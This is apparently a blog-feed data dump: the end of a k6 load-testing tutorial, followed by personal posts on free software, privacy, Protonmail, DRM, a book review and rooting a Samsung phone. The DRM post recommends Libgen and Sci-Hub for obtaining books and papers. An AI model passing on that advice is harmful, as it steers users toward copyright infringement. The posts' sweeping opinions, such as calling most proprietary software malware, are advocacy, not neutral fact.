}) || errorRate.add(1);\n\n  sleep(Math.random() * 1 + 1); \u002F\u002F Random sleep between 1s and 2s.\n}\nRun with k6 run test.js:\n2.21.0 on ☁️  (ap-south-1) took 24s \n❯ k6 run test.js\n\n          \u002F\\      |‾‾| \u002F‾‾\u002F   \u002F‾‾\u002F   \n     \u002F\\  \u002F  \\     |  |\u002F  \u002F   \u002F  \u002F    \n    \u002F  \\\u002F    \\    |     (   \u002F   ‾‾\\  \n   \u002F          \\   |  |\\  \\ |  (‾)  | \n  \u002F __________ \\  |__| \\__\\ \\_____\u002F .io\n\n  execution: local\n     script: test.js\n     output: -\n\n  scenarios: (100.00%) 1 scenario, 10 max VUs, 1m0s max duration (incl. graceful stop):\n           * default: Up to 10 looping VUs for 30s over 3 stages (gracefulRampDown: 30s, gracefulStop: 30s)\n\n\nrunning (0m30.3s), 00\u002F10 VUs, 105 complete and 0 interrupted iterations\ndefault ✓ [======================================] 00\u002F10 VUs  30s\n\n     ✓ status is 200\n\n     checks.........................: 100.00% ✓ 105      ✗ 0   \n     data_received..................: 126 kB  4.2 kB\u002Fs\n     data_sent......................: 25 kB   841 B\u002Fs\n     http_req_blocked...............: avg=73.69ms  min=292ns    med=761ns    max=1.02s    p(90)=1.54µs   p(95)=688.76ms\n     http_req_connecting............: avg=21.67ms  min=0s       med=0s       max=245.46ms p(90)=0s       p(95)=223.77ms\n   ✓ http_req_duration..............: avg=252.72ms min=215.88ms med=230.31ms max=560.17ms p(90)=299.12ms p(95)=406.94ms\n       { expected_response:true }...: avg=252.72ms min=215.88ms med=230.31ms max=560.17ms p(90)=299.12ms p(95)=406.94ms\n     http_req_failed................: 0.00%   ✓ 0        ✗ 105 \n     http_req_receiving.............: avg=177.85µs min=103.82µs med=163.76µs max=366.5µs  p(90)=235.86µs p(95)=266.39µs\n     http_req_sending...............: avg=258.17µs min=96.92µs  med=215.88µs max=958.67µs p(90)=410.05µs p(95)=487.18µs\n     http_req_tls_handshaking.......: avg=50.22ms  min=0s       med=0s       max=614.14ms p(90)=0s       p(95)=460.3ms \n     http_req_waiting...............: avg=252.29ms min=215.17ms med=229.69ms max=559.86ms p(90)=298.42ms p(95)=406.52ms\n     http_reqs......................: 105     3.471037\u002Fs\n     iteration_duration.............: avg=1.84s    min=1.22s    med=1.85s    max=3.02s    p(90)=2.22s    p(95)=2.46s   \n     iterations.....................: 105     3.471037\u002Fs\n     vus............................: 1       min=1      max=10\n     vus_max........................: 10      min=10     max=10\nWe can see that all the checks passed without breaching any thresholds we’d set.\nSome important points:\nIn my local environment, I stress tested my service with 10k VUs which is quite a high number for the service but it was good to see it hold under extreme conditions as well. An important thing to note if you are spawning many VUs is that ulimit number should be high. This is described in their docs as well.\nTo debug the HTTP response you can run with --http-debug=\"full\" flag and get the verbose output for debugging.\nSummary#\nI’ve barely scratched the surface of what this tool does. You can export metrics to various data sources, add a lot more checks on the response code, use it with GRPC or WebSockets as well.\nOverall pretty happy with this tool and I am going to use more of it for future projects.\nReferences#\nhttps:\u002F\u002Fk6.io\u002Fblog\u002Fcomparing-best-open-source-load-testing-tools\u002F\nhttps:\u002F\u002Fk6.io\u002Four-beliefs\u002F#simple-testing-is-better-than-no-testing\nhttps:\u002F\u002Fk6.io\u002Fdocs\u002F\nhttps:\u002F\u002Fgithub.com\u002Fgrafana\u002Fk6\nFin",[],{"slug":1941,"title":1942,"link":1943,"pubDate":1944,"contentSnippet":1945,"tags":1946,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"free-software-important-for-privacy","Why Free Software and decentralization are necessary for privacy","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffree-software-important-for-privacy\u002F","Tue, 26 Oct 2021 00:00:00 +0000","Free Software means software which respects user’s freedom. It does not mean that the users get software without paying or for free of cost. Free Software is a matter of liberty not price. I sometimes call it swatantra\u002Fmukt software to clarify this point.\nPrecisely, Free Software gives users the following freedoms:\nFreedom 0: Freedom to run the software;\nFreedom 1: Freedom to study and modify the software. Users must have the source code of the software to exercise this freedom;\nFreedom 2: Freedom to share the software;\nFreedom 3: Freedom to share your modified versions;\nA software which lacks any of these freedoms is called nonfree\u002Fproprietary software. Most of the well-known proprietary software are malware.\nIf we do not have the source code of the software, we cannot inspect it for whether it has malicious functionalities. In particular, we cannot inspect whether the software has spyware or not. Even if we get the source code, we cannot remove the spyware unless we can modify it. In view of this note, freedom 1 is a precondition to user privacy.\nIf users cannot share the software, then they need to inspect the software themselves to know whether software has some spying functionality or not. Sharing the software allows us to give a copy of software to someone who can inspect. For example, nonprogrammers can share a copy of the software with someone to get the software inspected for malicious functionalities, maybe, in exchange for a fee. When we don’t know how to repair a fan, bicycle or a car and we give it to a mechanic who repairs for us. Similar is the case for software.\nLet’s say someone removed a spyware from a software, then they can share their modifications with others if Freedom 3 is granted. If Freedom 3 is not granted, then everyone need to modify themselves which is a lot of redundant work.\nThese freedoms give users collective control over the software. The collective control is necessary for users to get privacy. A nonfree software cannot be trusted for privacy. Please note that Free Software might not be sufficient for privacy. It is a precondition for privacy.\nFor example, Ubuntu operating system is a Free Software and it contained spyware in older versions. With Free Software, users have a defence to remove those malfunctionalities. With proprietary software, there is no such chance.\nAnother factor is decentralization. What I mean by decentralization is that network-based services allow self-hosting and federation. Please read this article by FSCI for details on how decentralization in combination with Free Software and end-to-end encryption can give you privacy.\nI will summarize the article for you here. Basically, when we use software installed in someone else’s computers(called servers), like Google Docs, we lose control over our computing. This is because all communications, say, in case of Google Docs will go via Google’s servers. Since, we are using Google’s computers for our computing they can log our activities and put us in surveillance. If the server is in our control or a trusted one, then this is not a problem but services like Google Docs does not allow users to deploy it on their own server(even if it would it would not be advisable due to Google Docs being nonfree software). So we need the freedom to self-host, which means freedom to run our own servers. This does not mean we have to run our own server. Granting users the freedom to self-host gives rise to many service providers. Then we can choose one which we trust, or pay someone to deploy our server.\nFederation means two users using different service providers can communicate. This is required, otherwise when we switch the service provider, we need to make effort to switch every contact to a new service provider. Federation allows us to switch service provider without other contacts switching the provider.\nExample of free software powered federated systems are Matrix, XMPP, Mastodon. Searx search engine is an example where self-hosting is allowed but the concept of federation does not apply.\nTo illustrate, we take an example of Matrix chat system. A user registered on service provider 1 can contact with users on service provider 2 on Matrix. All messages are end-to-end encrypted. And since the servers are under user’s control, they can control the policies and what data is being collected.\nThe conclusion is: Free Software and decentralization are necessary for privacy. Proprietary Software and centralized services cannot be trusted for privacy.",[],{"slug":1948,"title":1949,"link":1950,"pubDate":1951,"contentSnippet":1952,"tags":1953,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"javascript-ecosystem-software-development-are-a-hot-mess","The Javascript \"ecosystem\" is a hot mess and so is software development in general","https:\u002F\u002Fnadh.in\u002Fblog\u002Fjavascript-ecosystem-software-development-are-a-hot-mess\u002F","Sat, 16 Oct 2021 00:00:00 +0000","I have a small Vue 2 project (an admin UI for dictmaker) that I created with vue cli six months ago. Today, I picked it up again to finish it, and started out by doing a yarn upgrade. Of course, blindly upgrading all dependencies is never a good idea, but this is a tiny WIP project with just one dependency that I added, and there is a constant stream of GitHub dependabot alerts every month forcing me to upgrade some dependency or another, so what is the worst that could happen? At least that is what I thought.",[],{"slug":1955,"title":1956,"link":1957,"pubDate":1958,"contentSnippet":1959,"tags":1960,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"problems-with-protonmail","Problems with Protonmail","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fproblems-with-protonmail\u002F","Thu, 30 Sep 2021 02:06:19 +0530","Protonmail claims to automatically send end-to-end encrypted messages between all the Protonmail users. They claim that they do not have access to user’s private keys (Someone having access to your private keys can decrypt and read all your encrypted messages), by encrypting the user’s private keys with the hash generated by user’s password (which is known only to the user). The problem with this is: how do we know that Protonmail does not keep a copy of user’s private keys with themselves before encrypting it with user’s password hash? Also, we cannot really inspect the web application we use in the browser because it is not installed in our own devices, we are using it from Protonmail’s computers.\nThere is no need to trust server for email encryption. Email encryption can be done within the app. This method encrypts mails within the app before sending it to the server. Here is a guide to encrypt mails using pEp app. pEp encrypts mails very easily. You just have to send one mail to a pEp user to exchange keys and after that, all emails will be encrypted by default. Email encryption used to be hard to use, but it is no longer the case. pEp project has made email encryption (it uses OpenPGP) easier so that nontechnical people also have access to email encryption.\nThis is the main problem with Protonmail. When it comes to encrypting emails, there is no inherent need for the user to trust the server side for encryption, yet their whole model of encryption lies in trusting the server side. We cannot inspect their server side. We cannot inspect what they run or how they implement all this in their own computers. You can, however, inspect the app running in your own device if the app is free software.\nConclusion: Email encryption does not require user to trust the service provider. Users can encrypt emails in their device before sending the mail. Protonmail is making their users trust the server side for email encryption without any need for that. I advice against using emails from such email providers and instead use email providers which allow you to use independent app like pEp, Thunderbird, K9 Mail, so that you can encrypt emails before sending it to the server.",[],{"slug":1962,"title":1963,"link":1964,"pubDate":1965,"contentSnippet":1966,"tags":1967,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"story-of-this-website","Story of creation of this website","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fstory-of-this-website\u002F","Tue, 28 Sep 2021 00:00:00 +0000","This is the story of creation of the website you are reading and how it was created.\nI always wanted to create a website from as far as I can remember. This is because I wanted autnonomy over the content that I can post. Social media posting format is not suitable for website like this. Also the website has a cool domain on my name which feels really good.\nIn the Software Freedom Camp 2020, I met Sahil and Arun. Sahil already had a website, while Arun purchased a domain name around that time. I got inspired from Arun and bought this domain from gandi.net in October 2020.\nThen I took the project in Free Software Camp 2020 to learn Hugo. Didn’t learn much from there as I didn’t put a lot of time and effort into it.\nAfter the domain purchase, the website wasn’t up for 9 months. Finally, in July 2021, Sahil helped me set up this website. And after tinkering with the website, I learnt enough Hugo and git to maintain the website. And here I am, writing the story of the website.",[],{"slug":1969,"title":1970,"link":1971,"pubDate":1972,"contentSnippet":1973,"tags":1974,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"fscamp-2020-as-learner","My experience as a learner in Free Software Camp 2020","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffscamp-2020-as-learner\u002F","Mon, 27 Sep 2021 00:00:00 +0000","Index\nIntroduction\nWhat is Free Software Camp\nMotivation to join the camp\nHow I came to know about the camp\nExperience as a learner in the camp\nAftermath\nWord for learners of the upcoming camps\nIntroduction\nI participated as a learner in Free Software Camp 2020 organized by FSCI and FSF India. This is a post about my experience of the same. If you don’t know what free software is, then you can read my article on the same.\nI have never attended any software-related camp other than this one and therefore I have no idea what other camps are about and so I cannot compare this camp with any other camp of technical nature or one which involves introducing free software philosophy to the participants. Since the camp concluded a long before I am writing this post, there is a chance I forgot a lot of things about it or my feelings\u002Fopinions of many things at that time.\nWhat is Free Software Camp\nThis is my takeaway for what free software camp means. I think that the camp had two goals:\nTo acquaint the participants with free software philosophy.\nTo connect the learners with mentors and contribute to free software projects. These contributions don’t have to be technical in nature but they must contribute to free software in some way.\nThe camp was divided into the following phases:\nIce breaking sessions.\nIntroduce the learners with free software philosophy.\nGNU\u002FLinux Installation phase.\nA phase where we get to meet people who earn their living from free software.\nProjects phase.\nMotivation to join the camp\nI was already introduced to free software philosophy and started caring about the idea in 2020. The main thing I was looking at the time around September 2020 was: How does free software actually work in reality? I was not aware of communities that power free software. Curiosity to know how free software works was one motivation to join the camp.\nAlso, before the start of the camp, I already started shifting to free software but I needed help on: 1. Which software do people from free software community use? ; 2. To try and test these software.\nFor example, I came to know about BigBlueButton from the camp. It is a videoconferencing software which respects freedom and allows self-hosting.\nAnother motivation was to meet with like-minded people because usually people don’t get excited about free software and therefore, one can get demotivated.\nTo sum up, my motivations were:\nTo understand how free software communities work.\nTo know what software free software proponents use.\nTo meet like-minded people.\nMy motive was not really learning anything technical.\nHow I came to know about the camp\nThe camp was announced in mid September 2020. And a few days ago, I filled the volunteer form for FSF India. Due to that group’s announcement, I came to know about the camp.\nExperience as a learner in the camp\nI registered for the camp and started joining the sessions when the camp commenced. In the first stage, the learners were divided into small groups based on their language preference. I was added to Group 6 which was a Hindi group and Sruthi was assigned to our group from the organizing team as a co-ordinator(Sorry I cannot find a word for this).\nI mixed up well with this group. We used to have regular meetings and shared what we think about various issues. People used to feel autonomous in sharing their thoughts. And we also helped each other in various things, for example, I helped people in setting up their gpg keys and taught how to send encrypted emails. So, it can be said that Group 6 ice-breaking session really broke the ice or maybe the ice was not even there to begin with. Groups were also given an activity to present on a topic assigned by the organizers. Our group decided to have an audio presentation on the topic. The topic was something related to democracy and digital rights(how surveillance, censorship etc. affects democracy). We all rehearsed it many times, suggested each other of points and finally completed the recording and submitted it for the presentation in a camp session. I found that overall, be it my group, other learners, organizers, or mentors, people were very helpful, kind and inclusive.\nThis ended our ice-breaking sessions.\nNext was GNU\u002FLinux installation phase. I used to have Macbook at that time. I could boot GNU\u002FLinux in my Macbook but the touchpad didn’t work. So that was a bit sad. I badly wanted to run a GNU\u002FLinux distro on my Macbook. Maybe external mouse would have worked. But I didn’t try that. Therefore, I proceeded in the camp with MacOS installed.\nNext was the phase where we met people who earn their living from free software. I attended sessions by Abhas and Nagarjuna. They were good and gave me some insights. Abhas has a way of making sessions interactive which I would like to do in my own sessions(not only in camp but anywhere). Nagarjuna raised issues about copyright mainly and was very interactive, which I really liked. He was in no hurry but asked questions from us and patiently waited for our responses and cleared doubts.\nNow came the projects phase. Initially, I was not excited to do any technical project. So I thought of choosing a non-technical project. I ended up choosing a technical one because I wanted to learn how to create website so that I can create my own wesbite. I chose the project offered by Karthik to learn Hugo Static Site Generator to create websites. The project was to create and maintain Privacy Yathra website. I took the project as a long-term work rather than just set up the website as a part of the camp and run away.\nI didn’t work a lot on the project and I could not learn Hugo within the deadline set by the camp. But later on, I set up this website you are reading, with the help of Sahil. From there on, I learnt from different people about different things about creating and maintaing the website. The Privacy Yathra website(which was the project of the camp) is not yet created but as now I know how to work with Hugo and git(actually I still don’t know much), I would one day be up. Keep looking for Privacy yathra website, folks :) It can be up anytime.\nShout out to all the people who made this work so smoothly. Especially organizers were always available for any help I needed and were very welcoming.\nAftermath\nAfter the conclusion of the camp, I am integrated with FSCI as a campaigner. As mentioned above, I set up my website after the camp. Also, I am a part of the organizing team of the succeeding camp named “Software Freedom Camp Diversity Edition 2021” organized by FSCI. This year(2021) we are looking for diversity. We are focusing on reaching out to groups underrepresented in the free software community.  Registrations for learners are open till 15th October. Please register if you are interested and from an underprivileged backgroud. Please help us raise awareness about the camp so that we can reach the needy. You can share the camp poster on social media(even on Twitter, Facebook, Instagram, if you use them anyway, then why not?), with your contacts in chat, emails etc.\nWord for learners of the upcoming camps\nIf you are participating as a learner in any of the editions of the camp, then I have some advice for you. Hopefully, the above text gave you some idea on what happens in the camp. I think the best way to contribute to the camp is to contribute to free software. You might be surprised that the best way to contribute to free software is not about adding code or features to free software, although they are very good contributions. I think it is not a good idea to improve the code of some free software or work on a free software project for a few months and then forget about free software. I would suggest you to understand what free software philosophy is, why free software is important, use free software in your own lives for your own work and the hardest part, try to convince others to use free software and avoid proprietary software. If you are committed to free software philosophy, you will develop free software and contribute to free software as a side effect. If you are not committed to free software philosophy, then you will only contribute code to free software as a part of the camp and then forget about it. Take it as a lifetime project to contribute to free software to switch to free software and writing code to develop or improve the free software. Also, avoid proprietary software.",[],{"slug":1976,"title":1977,"link":1978,"pubDate":1979,"contentSnippet":1980,"tags":1981,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"fs-and-oss-same","Are Free Software and Open Source Software the Same Thing?","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffs-and-oss-same\u002F","Sat, 25 Sep 2021 03:40:00 +0530","Have you ever wondered what the difference is between the terms “free software” and “open-source software?” Perhaps, you think they are the same. It is often misunderstood that “free” refers to free of cost. The term “FOSS” is also very common. It expands to Free and Open Source Software. In addition, I have heard people say that since the software is open source and available free of cost, therefore it is denoted by the term FOSS. In this post, I’ll illustrate the difference between the two terms.\nFree Software refers to software which respects users freedom to run, study, modify, share and share the modified versions of the software. For example, VLC media player, Firefox browser, and Emacs. “Free” in Free Software refers to liberty, not price. The software I just mentioned also qualify as Open Source. The definition of Open Source can be read on the opensource.org website by visiting this link. Since it is a bit too long, I didn’t include it here.\nPractically speaking, the terms “free software” and “open source software” refer to the same class of software. However, the main difference between the two terms lies not in the actual software, but the values behind the respective movements. Free Software movement campaigns for users’ freedom and that users must control the software running in their own devices. On the other hand, Open Source movement does not put the issue in ethical terms like users’ freedoms or rights, but more of like a practical choice.\nThe term “free software” existed since 1984, while the term “open source” came into existence in 1998. Let’s look at why this new term was introduced even though the term “free software” was already there.\nQuoting Open Source Initiative on coining the term open source,\nThe “open source” label was created at a strategy session held on February 3rd, 1998 in Palo Alto, California, shortly after the announcement of the release of the Netscape source code. The strategy session grew from a realization that the attention around the Netscape announcement had created an opportunity to educate and advocate for the superiority of an open development process. The conferees believed the pragmatic, business-case grounds that had motivated Netscape to release their code illustrated a valuable way to engage with potential software users and developers, and convince them to create and improve source code by participating in an engaged community. The conferees also believed that it would be useful to have a single label that identified this approach and distinguished it from the philosophically- and politically-focused label “free software.” Brainstorming for this new label eventually converged on the term “open source”, originally suggested by Christine Peterson.\nIt is apparent from the above-mentioned quote that the term “Open Source” was coined as a way to market the same idea represented by the term “Free Software” in a way detached from philosophical or moral considerations. It was promoted as a superior model of software development, not as a matter of user rights or freedom.\nMy friend and fellow Free Software activist Praveen has put this difference into a nice quote, which is very relevant to distinguish the two:\nOpen Source wants to create better software, Free Software wants to create a better society.\nQuoting Richard Stallman from his famous article on the difference and the dangers that the approach open source movement has in avoiding the ethics part:\nWhen open source proponents talk about anything deeper than that, it is usually the idea of making a “gift” of source code to humanity. Presenting this as a special good deed, beyond what is morally required, presumes that distributing proprietary software without source code is morally legitimate.\nThis approach has proved effective, in its own terms. The rhetoric of open source has convinced many businesses and individuals to use, and even develop, free software, which has extended our community—but only at the superficial, practical level. The philosophy of open source, with its purely practical values, impedes understanding of the deeper ideas of free software; it brings many people into our community, but does not teach them to defend it. That is good, as far as it goes, but it is not enough to make freedom secure. Attracting users to free software takes them just part of the way to becoming defenders of their own freedom.\nSooner or later these users will be invited to switch back to proprietary software for some practical advantage. Countless companies seek to offer such temptation, some even offering copies gratis. Why would users decline? Only if they have learned to value the freedom free software gives them, to value freedom in and of itself rather than the technical and practical convenience of specific free software. To spread this idea, we have to talk about freedom. A certain amount of the “keep quiet” approach to business can be useful for the community, but it is dangerous if it becomes so common that the love of freedom comes to seem like an eccentricity.\nThe difference between the two movements is best illustrated by an incident in which TiVo - a video recorder - used a software which was free\u002Fopen-source and gave users legal right to modify it, but the hardware won’t allow users to run their modified versions. This restriction was fine for Open Source proponents like Linus Torvalds, but Free Software proponents like Stallman opposed such restrictions. A new version of GNU General Public License was written by the Free Software Foundation to address this issue. For more details on this, I would suggest you to read this page on the GNU website. Moreover, you can read the Wikipedia page too by clicking here.\nPersonally, I use the term “Free Software” and not “Open Source” due to my opposition against proprietary software. Furthermore, I agree with the ethical values associated with the term “Free Software”. Using this term helps me spread awareness about the difference and propagate the ethical values.\nFeel free to use the term you prefer, but it is important to understand what the term means.",[],{"slug":1983,"title":1984,"link":1985,"pubDate":1986,"contentSnippet":1987,"tags":1988,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"drm","What is DRM and how it threatens your freedom","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fdrm\u002F","Thu, 23 Sep 2021 00:00:00 +0000","Ever used Spotify, Apple Music, Netflix or Hotstar? Ever wondered why you cannot copy the files from them and share it with someone? Ever wondered why you cannot download the files in your device and transfer in another device or play them in any other media player? Let’s be clear on this: Downloading means that the file is now in your device and you can play\u002Fview it in any app of your choice. Download does not mean that you can only view the file in that particular app(like Spotify or Netflix) for offline use.\nThe answer is DRM.\nDRM is usually known as Digital Rights Management by publishers, record labels and streaming dis-services. The long form Digital Restrictions Management is closer to reality.\nDRM basically means digital files(any form of artwork, PDF, music files or software) are encrypted in such a way that users cannot copy them. This threatens user’s freedom because technology allows us to copy files and share with others. What is the point of “technological progress”(being able to copy files is an example of technological progress) if you cannot even use it?\nCopying is an inherent nature of digital files to the extent that it reminds of the quote by Bruce Schneier, “Trying to make digital files uncopyable is like trying to make water not wet.” Also, since we can copy files without any marginal cost and share it to everyone, it raises a fundamental moral question, quoting Eben Moglen, “If I can provide to everyone all goods of intellectual value or beauty, for the same price that I can provide the first copy of those works to anyone, why is it ever moral to exclude anyone from anything? If you could feed everyone on earth at the cost of baking one loaf and pressing a button, what would be the moral case for charging more for bread than some people could afford to pay?”\nThe usual logic in favor of DRM is that artists lose money when someone copies a file and share it with someone. This argument assumes that everyone who has a copy of the file would have paid for a copy if sharing was prohibited. In reality, a lot of files would not even have been sold. Imagine a friend shared a book with you and you read it. Would you have read all such books shared with you if sharing was prohibited? When someone refuses sharing a book or a music file with you, do you go to market and purchase that thing? Also, when the marginal cost of copying is zero, nobody is losing money when you copy the file. Compare this situation with physical objects like chairs, noodles, clothes etc. Every piece of that physical object has a production cost while for software and digital files,the cost is only in the development of that file or software but every copy is effectively free-of-cost(given that computers and mobile phones are household items that people use for personal use anyway, so the cost of device is not included in the copying).\nNote that in the current system, only well-established artists really make money. Usually, the artists do not get fair compensation and the streaming companies are the one earning from artists’ work. These DRM imposing dis-services act like a middle agency between users and artists, effectively robbing user’s freedom and artists’ pay.\nShould we prohibit users from copying files and sharing them OR should we change our business model and allow them to share the files? Since, DRM benefits only publishers, streaming services, record labels and the like, while others receives discrimation, exclusion and lack of freedom to use technology, I think the the business model needs to change rather than restrciting users from sharing.\nDRM is also being used in educational resources now-a-days which excludes people who can’t afford them or people who value freedom and won’t use files containing DRM.\nDRM is already being used to discriminate against the poor in many ways.\nWhen a DRM imposing service gets shut down, users lose access to all their data they purchased from that service. For example,Yahoo music used to distribute music files with DRM and when it shut down, users could not backup their files and lost access to all the music they purchased. Another example is when Microsoft’s ebook store closed, all the users lost their ebooks purchased from there.\nShould we wait for the companies to eliminate DRM from the files?\nNo. Companies might never remove DRM from their services. Rather, we can refuse to use services which impose DRM. You can use youtube-dl to download music files from many sites. You can use Newpipe Android app to download music and videos from YouTube. For educational resources, we can use Libgen or Scihub to download the books and academic papers. Check the DRM-free guide by FSF for websites which provide DRM-free content.\nEverytime you pay for a DRM product, the companies building such products get funds, either by your data or you pay them directly. The measure of refusing to use DRM services brings change to an extent– that we do not fund such practices.\nBut the real change is to have a model for authors\u002Fcreators to get funded and they release the content without DRM.\nWe can fund artists without DRM. Fans can directly fund artists for their work. A lot of YouTubers get money from their Patreons and people do directly fund creators.\nHere are a few examples to demonstrate that the model can work:\nLouis C.K. released copies of his film without any restrictions or DRM and the film got profit in 12 hours.\nDiesel Sweeties released a DRM free webcomics and had huge success. They started releasing DRM-free payment optional model since then.\nThe band Radiohead released an album on their website without any restrictions with listeners allowed to pay nothing or any amount they would like to.\nTherefore, we can fund artists directly and copy creative works will freedom. It is possible to have both freedom and creative work. What do you think?",[],{"slug":1990,"title":1991,"link":1992,"pubDate":1993,"contentSnippet":1994,"tags":1995,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"phantoms-in-the-brain","Book Review: Phantoms in the Brain","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fphantoms-in-the-brain\u002F","Thu, 09 Sep 2021 00:00:00 +0000","A few days ago, I finished reading the book Phantoms in the Brain by V. S. Ramachandran. The topic covered here is fascinating, interesting, mysterious, disturbing and shocking. The cliche “Reality is stranger than fiction” comes to mind.\nThe book covers many disorders and tries to explain them in concrete naeurological terms.\nOne of the cases presented in the book was that majority of amputees who suddenly lost a limb in an accident feel pain in the lost limb. Many patients feel that the fingers of the lost limb (fingers are not even attached to the body) are clenched tightly and this leads to unbearable pain (called phantom pain and hence the title of the book).\nIn the past, neurologists regarded such cases as mental problems and handed over the patient to psychiatrists. The book holds the view that due to damages in specific portions of the brain leads to loss of functionality which that portion carries. This is fascinating because when trying to understand these cases, it seems like we are only looking at exceptional cases, but at the same time, they do tell a lot about the normal human brain. Ramachandran brought a fresh appraoch and looked at how phantoms (the patients still feel that the lost limb is attached to the body and such a limb is called a phantom limb) are generated and how the brain can be tricked into unlearning a phantom. Would you like to look at the solution\u002Ftreatment of the phantom pain? It is here. The solution is interesting as well.\nHuman brain can easily be tricked. Our brains carry so many cognitive biases, delusions, denial of the obvious facts. Quoting Oliver Sacks from the preface of the book, “The deeply strange business of mirror agnosia, and that of misattri­buting one’s own limbs to others, are often dismissed by physicians as irrational. But these problems are also considered carefully by Rama­chandran, who sees them not as groundless or crazy, but as emergency defense measures constructed by the unconscious to deal with sudden\noverwhelming bewilderments about one’s body and the space around it. They are, he feels, quite normal defense mechanisms ( denial, repression, projection, confabulation, and so on) such as Freud delineated as universal strategies of the unconscious when forced to accommodate the intolerable or unintelligible.”\nThe topic presented here aligns very well with Daniel Kahneman’s Thinking, Fast and Slow, which says that there are two modes of thinking – System 1 and System 2. System 1 is fast, effortless and jumps to conclusions. It cannot be consciously controlled by us but we can change our habits to feed them into System 1 (like driving, walking, playing a cricket ball are in System 1 of the person practicing enough). System 2 is slow, effort and resource consuming. Heavy cognitive tasks are done using System 2.\nOverall, Phantoms in the brain urges neuroscientists to be more open in their approach, while at the same time being fun to read, engaging and accessible to the general audience.",[],{"slug":1997,"title":1998,"link":1999,"pubDate":2000,"contentSnippet":2001,"tags":2002,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"rooting-my-phone","I rooted my Samsung Galaxy S9+","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Frooting-my-phone\u002F","Tue, 07 Sep 2021 00:00:00 +0000","(Warning: Installing a custom ROM on your device will void your warranty and there is a risk that it can brick your device)\n(Note: In my case, I could afford to risk bricking my phone)\nIndex\nWhat is rooting?\nMy experience of rooting\nHow much free software does iode OS have\nHow to install a custom ROM\nWhat is rooting?\nA user having root access of an operating system means they have the capability to make unrestricted changes in the system. Such a user is also called a superuser or an admin. Check out the wiki page for more details.\nMobile phones which ship with Android pre-installed in their devices do not give users root access by default. For example, the users have read-only permissions for \u002Fsystem\u002F partition on the phone. Therefore, users need to put effort into taking root access of their devices. This extra effort is what we call ‘rooting’. Check this Wikipedia page for a good list of advantages that rooting provides to users. This gives users full control over their devices.\nAndroid phones are shipped with nonfree software preinstalled which users cannot remove without having root access. Apps like YouTube, Google Play Store and other malware by Google are usually preinstalled. I wanted to remove the nonfree software from my phone.\nTo read the issues of freedom in Android in more detail, please check Richard Stallman’s article on this topic.\nMy experience of rooting\nI have Samsung Galaxy S9+ phone and I searched on the internet for ROMs that can be installed in this device. I found the information on internet very confusing and unorganized. Since there was a risk of bricking my phone which would make it not usable, I thought of consulting someone who has installed custom ROM many times and can give some of their time to guide me. I consulted Abhas for this who is a hacker and has a lot of experience in installing custom ROMs. We were on a video call and Abhas gave me instructions.\nThe steps we did are listed here in this text file. Note that I used Debian, which is a GNU\u002FLinux based operating system in my laptop. Depending on your phone model and laptop operating system, the steps mentioned at the URL will differ.\nFirst, we tried installing Carbon ROM but it failed somehow. Then Abhas suggested me to try iode OS and I installed it. The XDA page for iode OS for my phone is here.\nCheck iode OS Screenshots taken by me after the fresh install (I may have installed a few apps before taking these Screenshots)\nImportant Note: After the install, the Jio sim does not work because iode OS (and many other custom ROMs) do not have Volte support.\nFor gaining root access, I flashed Magisk using TWRP.\nAfter this, I learnt flashing a ROM myself and I successfully installed an older version of Lineage OS myself on Moto G4 Plus.\nHow much free software does iode OS have\niode OS is a free software operating system which does not have any Google apps pre-installed. Infact, the only nonfree software app pre-installed is Magic Earth. I immediately uninstalled that app. I suggest iode OS team to remove Magic Maps. If they would like to add any maps app, my suggestion to them is to add Organic Maps which takes data from OpenStreetMap.\nThe phone still contains nonfree firmware which is necessary for some hardware, like WiFi, to function properly, and the nonfree firmware itself is a serious issue in terms of user freedom. Even though the phone does not contain 100% free software, it is still a big step towards my freedom. There are no Google or Samsung apps in my phone which were pre-installed in the phone.\nNonfree software in iode OS: Magic Earth + nonfree firmware.\nList of a few pre-installed software in the iode OS:\nF-Droid, modified to give priority to iode repository;\nQKSMS\niode Browser\nmicroG\npep\nGeometric Weather app\nHow to install a custom ROM\nYou can also install a custom ROM if you have an Android phone. If you have an iPhone, I don’t know anything about flashing a custom ROM there as of now. Perhaps ditching the iPhone is the only step towards freedom.\nTo find a custom ROM built for your phone, first check if Lineage OS has an official support for your phone. If Lineage OS is available for your device, then go for it. Also, check Lineage OS website for instructions to install custom ROM on your phone.\nSteps for choosing a custom ROM:\nVisit the XDA Forums.\nScroll down to All Categories section.\nChoose your manufacturer from the All Categories list, for example, Samsung, Redmi etc.\nChoose exact model of your phone, like Samsung Galaxy S9+. For my phone, this leads to this page.\nChoose ROMs, Kernels from the list. This leads us to this page for my phone model.\nCheck for posts with OSS and OFFICIAL tags. Also check if gapps (Google Apps) are included or not. I suggest you to not include gapps.\nIf you click on a post, it will also contain instructions on how to flash a custom ROM.\nNow the steps involved in installing custom ROM on your phone are:\nUnlock the bootloader of the phone.\nRun the phone in download mode and flash a recovery project like TWRP into the phone.\nUse TWRP to wipe all the data– Dalvik Cache, system, cache, data. Flash the downloaded ROM image.\nReboot to recovery.\nDepending on your device and the operating system in the laptop, the way to perform these steps would differ.\nI know that these steps can be overwhelming for nontechnical users or users who haven’t done this before. Therefore, I am planning to make a video tutorial on rooting a phone in the 